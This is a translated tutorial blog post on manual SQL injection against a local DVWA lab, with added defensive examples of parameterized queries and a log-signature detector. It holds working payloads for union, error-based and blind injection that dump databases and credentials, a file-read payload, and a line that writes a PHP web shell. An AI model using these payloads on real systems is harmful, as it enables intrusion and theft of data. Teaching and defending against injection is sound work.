"Web Security" sixth bullet: Manual SQL injection

Source: Internet
Author: User
Tags: benchmark, explode, manual SQL injection

This article was written some time ago, after I had gained a new understanding of SQL injection. It was originally prepared as a contribution elsewhere, but was sent back because the content is too basic; keeping it in a drawer seemed pointless, so it is published here. The original had many pictures, but posting images on the blog is troublesome, so a link to the Word document is given at the end of the article for anyone who wants to download it.

Note: this article is aimed at readers who already have some understanding of SQL injection and can use tools such as sqlmap or Pangolin for automated SQL injection testing, but who also want to understand how those tools work and the principles behind SQL injection.

0x00 Basic theory

0x01 Injection tips and basic patterns:

First, you need some familiarity with the following functions and basic statements.

1. Plain union select:

SELECT * from user where id='' union select 1,2,3,4 from fabiao#+'.js

2. and select:

URL and (select count(username) from admin)>0  // guess a column name in the database; the data type can be guessed the same way

URL and (select length(username) from admin limit 1)>0  // guess the length of the column value: change the >0 to the length being guessed

URL and (select top 1 ascii(substring(username,1,1)) from admin)>0  // guess the content: compare the result against the ASCII table; ascii and substring are MySQL functions, MSSQL differs slightly

3. Time-based blind:

URL union select 1,benchmark(1000000,md5('test')),1 from user where userid=1 and ord(substring(username,1,1))=97

URL union select if(substring(password,1,1)='a',benchmark(10000000,sha(1)),0) user,password from mysql.user where user='root'

4. Writing to a file:

mysql> select '<?php echo shell_exec("ifconfig");?>' into outfile 'f:/wamp/www/shell.php';

It seems that when the page is encoded as GBK, < and > are escaped to HTML entities; in that case this should be considered together with a file inclusion vulnerability.

5. Reading a file:

URL union select 1,load_file('E:/wamp/www/test.txt'),2,3,4,5,6--+  // note that when MySQL reads or writes files, backslashes must be escaped, i.e. E:\\wamp\\www\\test.txt

6. Reading data from the database:

mysql> select concat(username,0x3a,password) from admin;  // reads the data in the form username:password

URL and ascii(substring((select concat(username,0x3a,password) from admin),1,1))>0

7. Comments:

For MySQL: /*! ... */

MySQL executes the statement between these markers, while other databases ignore it as a comment; this is often used to bypass a WAF.

8. Injection without spaces:

select/**/*/**/from/**/user;  // /**/ can stand in for a space

0x02 Frequently used functions:

concat(str1,str2,str3): string concatenation

group_concat(distinct column_name): used together with group by; adding distinct concatenates the distinct values of column_name

ascii(): returns the ASCII code of a character

substring(str,pos,length): takes length characters from str starting at position pos

benchmark(1000000,md5('test')): used in time-based blind injection; executes md5('test') one million times to produce the delay

if(condition,true_sentence,false_sentence): used in time-based blind injection; if condition holds, the second argument is evaluated, otherwise the third

0x03 Deciding which injection method to use:

After reading the section above, the question arises: there is union injection, and injection, and various kinds of blind injection; which one should be used?

The decision is based on how the page behaves. Append a single quote ' and look at the result:

1. Error ==> error-based injection || union injection

2. No error, but the page content changes (error messages are suppressed) ==> boolean-based blind || union injection

3. No change in page content ==> time-based blind || union injection

0x04 Time-Based blinds:

Time-based blind injection is a little tricky, so here it is spelled out.

In what kind of environment is time-based blind injection used? When the statement being executed produces no echo.

Example: a login.

$num = SELECT COUNT(*) from user where uid='$uid' and sleep(5)--+' and password='$pwd'

if ($num) return 1;

else return 0;

Depending on the number of rows the query returns, there are two outcomes: success or failure. During injection, a failure may be returned because the injected statement is badly constructed and causes a syntax error, or because a condition (such as ascii(substring(password,1,1))>80) is not satisfied. I only care about the second kind, but the first kind interferes with it. To tell them apart, I make the correctly executed statement delay a few seconds before returning, so the two cases are distinguishable. This is time-based blind injection.
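The login snippet above, as an added example that is not part of the original post: the string-spliced query next to its parameterized form, run against a constructed SQLite table (SQLite has no sleep(), so the example shows the comment-truncation half of the page's payload rather than the delay).

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the page's user table (not DVWA's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (uid TEXT, password TEXT)")
    # Plaintext password only to mirror the page's snippet; real code stores a hash.
    conn.execute("INSERT INTO user VALUES ('alice', 'correct-horse')")
    return conn


def login_vulnerable(conn, uid, pwd):
    """Splices the inputs into the SQL text, like the page's $uid / $pwd snippet."""
    sql = f"SELECT COUNT(*) FROM user WHERE uid='{uid}' AND password='{pwd}'"
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterized(conn, uid, pwd):
    """Same query with bound parameters: the input can never alter the statement."""
    sql = "SELECT COUNT(*) FROM user WHERE uid=? AND password=?"
    return conn.execute(sql, (uid, pwd)).fetchone()[0] > 0


def demo():
    """Run both logins with an honest attempt and with the page's comment-out pattern."""
    conn = make_db()
    # Closes the quote and comments out the rest, as the '--+' in the page's example
    # does; SQLite has no sleep(), so the truncation alone is what is shown here.
    injected_uid = "alice' -- "
    return {
        "honest_vuln": login_vulnerable(conn, "alice", "correct-horse"),
        "honest_safe": login_parameterized(conn, "alice", "correct-horse"),
        "wrong_pwd_vuln": login_vulnerable(conn, "alice", "wrong"),
        "injected_vuln": login_vulnerable(conn, injected_uid, "wrong"),
        "injected_safe": login_parameterized(conn, injected_uid, "wrong"),
    }


if __name__ == "__main__":
    for case, ok in demo().items():
        print(f"{case:>15}: {'login OK' if ok else 'rejected'}")
```

With the spliced query the password check is commented away and the login succeeds without a valid password; with bound parameters the same input is just a user name that does not exist.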

Similarly, update, delete and other statements can also be exploited with time-based blind injection; this is not covered here. If interested, see http://drops.wooyun.org/tips/2078, "Using INSERT, UPDATE and DELETE injection to fetch data".

0x10 Practical chapter

The DVWA system is used for the walkthrough, with its security level set to low.

0x11 MySQL built-in database:

When the MySQL version is above 5.0 there is a built-in database, information_schema, which holds information about databases, tables, columns and so on.

One of the most commonly used tables is columns; literally it lists column names, but each row also records the table and the database the column belongs to.

For example, to extract all database names:

select group_concat(distinct table_schema) from information_schema.columns;

To extract all table names in the dvwa database:

select group_concat(distinct table_name) from information_schema.columns where table_schema='dvwa';

0x12 Error-based injection:

MySQL has three kinds of error-based injection: floor, extractvalue and updatexml. Only extractvalue is used here as an example.

After submitting the single quote, MySQL reports an error, so according to the conclusions above this is error-based injection.

Basic injection statement: and extractvalue(1,concat(0x5c,(select table_name from information_schema.tables limit 1)))

1. Dumping the databases

http://127.0.0.1:8080/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and extractvalue(1,concat(0x5c,(select table_schema from information_schema.columns group by table_schema limit 2,1)))--+

Different databases are obtained by changing the limit in the injected statement.

2. Dumping the tables

Dumping the tables works on the same principle.

3. Dumping the columns of a table

The XPath error message has a length limit, so the values are read one at a time.

http://127.0.0.1:8080/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and extractvalue(1,concat(0x5c,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit)))--+

4. Dumping the data

Using the column information from the previous step, dump the data from the corresponding table. concat can be used here to join the columns that need to be dumped so they come out together.

http://127.0.0.1:8080/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and extractvalue(1,concat(0x5c,(select concat(user,0x5c,password) from users limit 1)))--+

0x13 Union injection:

Personally I prefer union. union requires that the two queries have the same number of columns, so first work out how many columns the original query returns.

1. Determine the number of columns

http://127.0.0.1:8080/dvwa/vulnerabilities/sqli_blind/?Submit=Submit&id=1' order by 1--+

Keep increasing the number in the order by clause until the page errors or changes; the last number that works is the number of columns.

Note that the number of columns here is the number of columns in the query, not the number of columns in the table.

For example:

select user,password from users  // the query has 2 columns

select * from users  // the query's column count equals the table's column count

2. Determine which data is displayed on the page

Not everything the query returns is displayed on the page (some output is commented out or never output at all), so to get data echoed back, find out which columns are usable.

If there is no usable echo position, union injection cannot be used.

3. Dumping the databases (all results at once):

http://127.0.0.1:8080/dvwa/vulnerabilities/sqli_blind/?Submit=Submit&id=1' union select group_concat(distinct table_schema),2 from information_schema.columns--+

0x14 Boolean-based blind injection:

If union injection finds no echo point and error messages are suppressed, consider boolean-based blind injection. Blind injection usually needs many repeated requests; only a few simple examples are given here.

1. Basic judgment

http://127.0.0.1:8080/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and ascii(substring((select password from users limit 1),1,1))>51--+

Test values one at a time, narrow the range, and home in on the ASCII value.

0x15 Time-based blind injection:

Time-based blind injection should be the last resort, when nothing else works. Because it judges whether the injection succeeded and whether a condition holds through a database delay, it is very inefficient and the injection is very slow. Its usage scenario was described above and needs to be understood well; the examples in this section are not ideal.

1. Determine whether time-based blind injection is possible

Union form (if the effect is not obvious, add another 0): http://127.0.0.1:8080/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' union select 1,benchmark(10000000,md5("test"))--+

Boolean form: http://127.0.0.1:8080/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and sleep(5)--+

2. Dumping the databases:

The process is the same as for boolean-based blind injection.
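A detection-side counterpart to the walkthrough in 0x12 through 0x15, added here and not part of the original post: signature matching over constructed access-log lines that echo the DVWA requests above (the log lines and the signature names are made up for this example).

```python
import re
from urllib.parse import unquote_plus

# Signatures for the techniques this page walks through, matched case-insensitively
# after URL-decoding and after turning /**/ comments back into spaces (0x01, item 8).
SIGNATURES = {
    "union_select":   re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "error_based":    re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "time_based":     re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "schema_probe":   re.compile(r"\binformation_schema\.", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "file_access":    re.compile(r"\bload_file\s*\(|\binto\s+outfile\b", re.I),
}

# Request line of a common-log-format entry: method, target, protocol.
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def normalize(query_string):
    """URL-decode the query string and collapse inline comments used as spaces."""
    decoded = unquote_plus(query_string)
    return re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)

def classify(line):
    """Names of the signatures that fire on one log line (empty list if clean)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = m.group(1).partition("?")[2]
    text = normalize(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan(lines):
    """Return [(line_number, [signature, ...])] for every line that matched."""
    hits = []
    for number, line in enumerate(lines, start=1):
        names = classify(line)
        if names:
            hits.append((number, names))
    return hits

# Constructed sample log (common log format) echoing the DVWA requests on this page.
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jun/2015:10:00:01 +0800] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4100',
    '127.0.0.1 - - [01/Jun/2015:10:00:02 +0800] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27%20ORDER%20by%203--+&Submit=Submit HTTP/1.1" 200 4100',
    '127.0.0.1 - - [01/Jun/2015:10:00:03 +0800] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20and%20extractvalue(1,concat(0x5c,(select%20table_schema%20from%20information_schema.columns%20limit%201)))--+&Submit=Submit HTTP/1.1" 200 4200',
    '127.0.0.1 - - [01/Jun/2015:10:00:04 +0800] "GET /dvwa/vulnerabilities/sqli/?id=1%27/**/union/**/select/**/1,benchmark(10000000,md5(%22test%22))--+&Submit=Submit HTTP/1.1" 200 4100',
    '127.0.0.1 - - [01/Jun/2015:10:00:05 +0800] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20and%20sleep(5)--+&Submit=Submit HTTP/1.1" 200 4100',
]
```

Running scan(SAMPLE_LOG) flags lines 2 to 5 with the probe, error-based, union/time-based and sleep signatures respectively and leaves the plain id=1 request alone; the /**/ normalisation is what keeps the fourth line from slipping past the union signature.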

0x30 Tools used in this article:

Firefox browser + HackBar (browser extension)

DVWA (open-source web penetration testing system)

Resources:

http://drops.wooyun.org/tips/2078 Using INSERT, UPDATE and DELETE injection to fetch data

http://phpinfo.me/2014/01/02/146.html Three kinds of error-based injection in MySQL

http://drops.wooyun.org/tips/143 sqlmap user manual

http://www.cnblogs.com/kuoaidebb/p/4570101.html The author's blog on cnblogs (kuoaidebb)

Word document: http://files.cnblogs.com/files/kuoaidebb/SQL%E6%B3%A8%E5%85%A5%E5%8D%9A%E5%AE%A2.zip
